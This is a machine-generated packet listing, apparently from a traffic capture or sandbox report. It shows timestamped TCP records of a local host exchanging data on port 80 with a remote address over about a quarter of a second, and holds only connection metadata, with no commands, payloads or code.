Dec 27, 2023 17:57:24.862823009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.862838030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.862905979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.865175009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.865189075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.865240097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.867157936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.867188931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.867247105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.869412899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.869426966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.869467020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.871488094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.871503115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.871572018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.873553038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.873573065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.873636961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.875719070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.875732899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.875782967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.877751112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.877804995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.879000902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.879873991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.879936934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.881860018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.881892920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.881953001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.883977890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.883992910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.884047985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.886085033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.886120081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.886159897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.887958050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.887974024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.888025045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.889940977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.889955997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.890012980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.891988039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.892002106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.892050028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.893934011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.893949032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.894004107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.895941973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.895972013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.896023035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.897824049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.897836924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.897891998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.899732113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.899749041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.899801016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.901683092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.901696920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.901757002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.903604984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.903619051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.903667927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.905494928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.905597925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.907012939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.907329082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.907342911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.907385111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.909234047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.909287930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.909342051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.911118984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.911134958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.911185980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.913005114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.913018942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.913062096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.914745092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.914760113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.914812088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.916619062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.916631937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.916687965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.918437958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.918473005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.918540955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.920167923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.920182943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.920239925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.922008038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.922023058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.922081947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.923835039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.923849106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.923892975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.925549030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.925561905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.925604105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.927340984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.927355051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.927414894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.929014921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.929059982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.929121971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.930748940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.930799007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.930999041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.932497025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.932511091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.932559967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.934312105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.934326887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.934405088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.935905933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.935920000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.935976028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.937594891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.937608004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.937654018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.940699100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.940745115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.940798044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.944051027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.944065094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.944119930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.948245049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.948291063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.948456049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.951034069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.951049089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.951107979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.954891920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.954905033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.954952002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.957422972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.957439899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.957510948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.960540056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.960572958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.960625887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.963799953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.963814974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.963912010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.967046976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.967061996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.967118025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.970160007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.970175028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.970221043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.974387884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.974404097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.974455118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.976326942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.976341009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.976393938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.979274988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.979290962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.979353905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.982491016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.982506037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.982562065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.985888004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.985929012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.985980988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.988455057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.988468885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.988523006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.991671085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.991686106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.991736889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.994435072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.994448900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.994513035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.997383118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.997423887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.997489929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.000423908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.000437975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.000488997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.003454924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.003469944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.003526926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.006151915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.006166935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.006222963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.009314060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.009330034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.009378910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.011955023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.011970043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.012029886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.015036106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.015050888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.015100002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.017690897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.017704964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.017771006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.020423889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.020437956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.020483017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.023479939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.023493052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.023539066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.026257992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.026272058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.026319981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.029325962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.029337883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.029414892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.031553030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.031567097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.031626940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.034075975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.034095049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.034176111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.036742926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.036760092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.036820889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.039458990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.039474010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.039534092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.042349100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.042392015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.043015957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.045285940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.045300961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.045356989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.047682047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.047714949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.047770977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.050168991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.050182104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.050230026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.052449942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.052464962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.052525043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.055283070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.055296898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.055349112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.057670116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.057753086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.059014082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.060519934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.060534954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.060583115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.062829018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.062843084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.062900066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.065232038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.065253019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.065305948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.067653894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.067671061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.067727089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.070260048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.070363045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.071005106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.072664976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.072689056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.073997021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.074989080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.075004101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.075053930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.077414989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.077430010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.077481031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.079932928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.079947948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.080001116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.082230091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.082284927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.082634926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.084450006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.084462881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.084517002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.086817026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.086832047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.086884975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.089189053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.089204073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.089262962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.091604948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.091696024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.091749907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.093794107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.093811989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.093888998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.096039057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.096054077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.096116066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.098098993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.098143101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.098196983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.100728989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.100745916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.100821018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.102720022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.102741003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.102807045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.104746103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.104785919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.104847908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.107110023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.107130051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.107188940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.109457016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.109472036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.109524965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.111670971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.111686945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.111757040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.113801956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.113816977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.113873005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.115729094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.115746021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.115808010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.117849112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.117863894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.117933035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.119870901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.119888067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.119940042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.123457909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.123472929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.123578072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.126173973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.126190901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.126261950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.126672029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.126688004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.126732111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.128161907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.128185034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.128253937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.130444050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.130475998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.130587101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.133311033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.133373976 CET	80	49738	5.42.65.125	192.168.2.4
